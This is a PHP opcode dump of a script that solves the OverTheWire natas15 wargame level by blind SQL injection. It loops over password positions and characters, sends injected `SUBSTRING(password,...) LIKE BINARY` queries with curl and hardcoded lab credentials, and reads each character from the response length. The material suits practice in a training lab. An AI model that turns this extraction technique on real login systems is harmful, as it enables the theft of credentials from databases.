Finding entry points Branch analysis from position: 0 1 jumps found. (Code = 42) Position 1 = 67 Branch analysis from position: 67 2 jumps found. (Code = 44) Position 1 = 69, Position 2 = 12 Branch analysis from position: 69 1 jumps found. (Code = 62) Position 1 = -2 Branch analysis from position: 12 1 jumps found. (Code = 42) Position 1 = 64 Branch analysis from position: 64 2 jumps found. (Code = 44) Position 1 = 66, Position 2 = 14 Branch analysis from position: 66 2 jumps found. (Code = 44) Position 1 = 69, Position 2 = 12 Branch analysis from position: 69 Branch analysis from position: 12 Branch analysis from position: 14 2 jumps found. (Code = 43) Position 1 = 57, Position 2 = 63 Branch analysis from position: 57 2 jumps found. (Code = 44) Position 1 = 66, Position 2 = 14 Branch analysis from position: 66 Branch analysis from position: 14 Branch analysis from position: 63 filename: /in/hjqT0 function name: (null) number of ops: 72 compiled vars: !0 = $chars, !1 = $credentials, !2 = $ch, !3 = $pass, !4 = $target, !5 = $needle, !6 = $xx, !7 = $yy, !8 = $char, !9 = $target2, !10 = $page line #* E I O op fetch ext return operands ------------------------------------------------------------------------------------- 4 0 E > INCLUDE_OR_EVAL 'LIB_http.php', INCLUDE 6 1 INCLUDE_OR_EVAL 'LIB_parse.php', INCLUDE 8 2 ASSIGN !0, '1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' 9 3 ASSIGN !1, 'natas15%3Am2azll7JH6HS8Ay3SOjG3AGGlDGTJSTV' 10 4 INIT_FCALL_BY_NAME 'curl_init' 5 DO_FCALL 0 $15 6 ASSIGN !2, $15 11 7 ASSIGN !3, '' 12 8 ASSIGN !4, 'natas15.natas.labs.overthewire.org%2Findex.php' 13 9 ASSIGN !5, 'r+e' 14 10 ASSIGN !6, 1 11 > JMP ->67 15 12 > ASSIGN !7, 0 13 > JMP ->64 17 14 > INIT_FCALL 'substr' 15 SEND_VAR !0 16 SEND_VAR !7 17 SEND_VAL 1 18 DO_ICALL $22 19 ASSIGN !8, $22 18 20 ROPE_INIT 3 ~25 '%3Fusername%3Dnatas16%22+and+SUBSTRING%28password%2C' 21 ROPE_ADD 1 ~25 ~25, !6 22 ROPE_END 2 ~24 ~25, '%2C1%29+LIKE+BINARY+%22' 23 CONCAT ~27 !4, ~24 24 CONCAT ~28 ~27, !8 25 ASSIGN !9, ~28 19 26 CONCAT ~30 '%0A', !9 27 CONCAT ~31 ~30, '%0A' 28 ECHO ~31 20 29 INIT_FCALL_BY_NAME 'curl_setopt' 30 SEND_VAR_EX !2 31 FETCH_CONSTANT ~32 'CURLOPT_URL' 32 SEND_VAL_EX ~32 33 SEND_VAR_EX !9 34 DO_FCALL 0 21 35 INIT_FCALL_BY_NAME 'curl_setopt' 36 SEND_VAR_EX !2 37 FETCH_CONSTANT ~34 'CURLOPT_USERPWD' 38 SEND_VAL_EX ~34 39 SEND_VAR_EX !1 40 DO_FCALL 0 22 41 INIT_FCALL_BY_NAME 'curl_setopt' 42 SEND_VAR_EX !2 43 FETCH_CONSTANT ~36 'CURLOPT_RETURNTRANSFER' 44 SEND_VAL_EX ~36 45 SEND_VAL_EX <true> 46 DO_FCALL 0 23 47 INIT_FCALL_BY_NAME 'curl_exec' 48 SEND_VAR_EX !2 49 DO_FCALL 0 $38 50 ASSIGN !10, $38 24 51 STRLEN ~40 !10 52 CONCAT ~41 '%0A', ~40 53 ECHO ~41 25 54 STRLEN ~42 !10 55 IS_SMALLER ~42, 288 56 > JMPZ ~43, ->63 27 57 > CONCAT ~44 !3, !8 58 ASSIGN !3, ~44 28 59 CONCAT ~46 '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0ALa+pass+per+ora+e%27%3A+', !3 60 CONCAT ~47 ~46, '%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A%0A' 61 ECHO ~47 29 62 ASSIGN !7, 62 15 63 > PRE_INC !7 64 > IS_SMALLER !7, 62 65 > JMPNZ ~50, ->14 14 66 > PRE_INC !6 67 > IS_SMALLER !6, 33 68 > JMPNZ ~52, ->12 33 69 > CONCAT ~53 '%0ALa+password+e%27%3A+', !3 70 ECHO ~53 35 71 > RETURN 1
Generated using Vulcan Logic Dumper, using php 8.0.0